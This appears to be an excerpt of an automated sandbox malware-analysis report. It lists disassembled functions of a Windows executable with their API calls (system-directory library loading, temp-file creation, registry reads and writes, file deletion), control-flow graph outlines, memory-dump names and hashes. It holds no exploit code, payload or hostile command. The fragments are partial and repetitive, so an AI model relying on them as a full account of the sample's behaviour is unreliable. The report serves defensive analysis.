                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1495540970-0
                                                                                                                                                                                                                                • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 518 40689a-4068ba GetSystemDirectoryW 519 4068bc 518->519 520 4068be-4068c0 518->520 519->520 521 4068d1-4068d3 520->521 522 4068c2-4068cb 520->522 524 4068d4-406907 wsprintfW LoadLibraryExW 521->524 522->521 523 4068cd-4068cf 522->523 523->524
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004068EC
                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 525 40605c-406068 526 406069-40609d GetTickCount GetTempFileNameW 525->526 527 4060ac-4060ae 526->527 528 40609f-4060a1 526->528 530 4060a6-4060a9 527->530 528->526 529 4060a3 528->529 529->530
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                • API String ID: 1716503409-944333549
                                                                                                                                                                                                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 531 4015c1-4015d5 call 402da6 call 405eb7 536 401631-401634 531->536 537 4015d7-4015ea call 405e39 531->537 539 401663-4022f6 call 401423 536->539 540 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 536->540 545 401604-401607 call 405aeb 537->545 546 4015ec-4015ef 537->546 552 402c2a-402c39 539->552 540->552 558 40165b-40165e 540->558 555 40160c-40160e 545->555 546->545 549 4015f1-4015f8 call 405b08 546->549 549->545 564 4015fa-401602 call 405a6e 549->564 559 401610-401615 555->559 560 401627-40162f 555->560 558->552 561 401624 559->561 562 401617-401622 GetFileAttributesW 559->562 560->536 560->537 561->560 562->560 562->561 564->555
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                • API String ID: 1892508949-670666241
                                                                                                                                                                                                                                • Opcode ID: 6addcb1fcd499a813c44777b30af1a075f267100065c11ad40be965c351e5c4e
                                                                                                                                                                                                                                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6addcb1fcd499a813c44777b30af1a075f267100065c11ad40be965c351e5c4e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040248A Relevance: 4.6, APIs: 3, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 567 40248a-4024bb call 402da6 * 2 call 402e36 574 4024c1-4024cb 567->574 575 402c2a-402c39 567->575 577 4024cd-4024da call 402da6 lstrlenW 574->577 578 4024de-4024e1 574->578 577->578 581 4024e3-4024f4 call 402d84 578->581 582 4024f5-4024f8 578->582 581->582 583 402509-40251d RegSetValueExW 582->583 584 4024fa-402504 call 4032b4 582->584 588 402522-402603 RegCloseKey 583->588 589 40251f 583->589 584->583 588->575 592 40292e-402935 588->592 589->588 592->575
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0040B5F0,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2655323295-0
                                                                                                                                                                                                                                • Opcode ID: c2e77ddd5f06e5ba6494e1e5615a57a5b42731a95510819d931e3bca28b8233c
                                                                                                                                                                                                                                • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2e77ddd5f06e5ba6494e1e5615a57a5b42731a95510819d931e3bca28b8233c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 593 40259e-4025ba call 402de6 call 402d84 598 4025c0-4025cb 593->598 599 40292e-402935 593->599 601 4025d9-4025ec RegEnumValueW 598->601 602 4025cd-4025d7 RegEnumKeyW 598->602 600 402c2a-402c39 599->600 604 4025f5-402603 RegCloseKey 601->604 605 4025ee 601->605 602->604 604->599 604->600 605->604
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Enum$CloseValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397863658-0
                                                                                                                                                                                                                                • Opcode ID: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffba938f7f9a9646bc05872a2a2d1d1e7365e509dd4e3e586e1c2ded03845b65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405C01 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 609 405c01-405c12 call 406008 612 405c42 609->612 613 405c14-405c1a 609->613 614 405c44-405c46 612->614 615 405c24 DeleteFileW 613->615 616 405c1c-405c22 RemoveDirectoryW 613->616 617 405c2a-405c2c 615->617 616->617 618 405c33-405c38 617->618 619 405c2e-405c31 617->619 618->612 620 405c3a-405c3c SetFileAttributesW 618->620 619->614 620->612
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                                                                                                                                                                                  • Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DE3), ref: 00405C1C
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405C3C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1655745494-0
                                                                                                                                                                                                                                • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                                                                                                                                • Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 621 40252a-402542 call 402de6 call 402da6 626 402548-402566 RegQueryValueExW 621->626 627 40292e-402935 621->627 628 402596-40259c 626->628 629 402568-40256c 626->629 630 402c2a-402c39 627->630 634 4025fc-402603 RegCloseKey 628->634 631 402581-402594 call 406484 629->631 632 40256e-402571 629->632 631->634 635 402573-402577 632->635 636 402579-4025f5 632->636 634->627 634->630 635->628 635->636 636->634
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040B5F0,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                                                                • Opcode ID: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ada99d8dff58305b15045bad38a44ab5f8654d60486fc4be6a411efa208bc5f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
